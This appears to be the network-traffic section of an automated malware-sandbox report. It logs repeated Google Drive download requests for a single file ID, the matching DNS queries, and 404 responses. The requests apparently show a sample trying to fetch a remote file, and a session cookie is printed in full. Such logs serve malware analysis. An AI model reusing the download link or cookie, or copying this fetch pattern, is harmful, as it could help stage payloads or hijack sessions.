Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:43:52 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-ABLVDx_RIDQIwWAxcW5SDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC6N0MqpgTr3mXmL3BvIcKc5K-Bnu30U2byoJ1Vhe3LDKvgHB3raoW9g6t0fNZAPw31eIc2ebdjcVgServer: UploadServerSet-Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ; expires=Wed, 04-Jun-2025 15:43:52 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:43:58 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-U_DTX1rNqJiHhLT7MhQq7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC7FRv6YdSB9wL2xR-zxuYwWjCyK_34fidWYGc4vRRF5NUJOb5b2SMf_0R2FzYY-tXDI_P7qxYvwrQServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:44:03 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-QcdGmAdYilxKAr-VRYYgHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC7_P4xXhXBDLn0pqycST3WC2yXWEcpb6KiyW0aQ677lJcxTLOFygHUCqcS513hg462eiJxiFvunwgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:44:09 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-ejXqSIwE6xFF7rTC1_CalA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652X-GUploader-UploadID: AFiumC6uaC23Ma87UXoh5ekwYA0hY1YFZdrpS8UJd3mIwLOBoZTS811bIJMxthX9xKGLVyexoErtes0QzQServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:44:14 GMTContent-Security-Policy: script-src 'nonce-V5Ij825rmG2bwoh83j-dNQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC446h0B54JEKRl6s_XXFGV2nxauNGZgaI2Past7Bhj_e71JAiseBFgNJPtSM-tYnulggu5z_hNrHAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:44:20 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-rlOwPRkDZBH0TkiNGCdZtw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC4cghIbPf3v61Nm6YOYT51i1FWU0xnwAdgZco3ZcxE6ALyNXzd4yvSzToemjc3PPQrb-FvG32cYmQServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
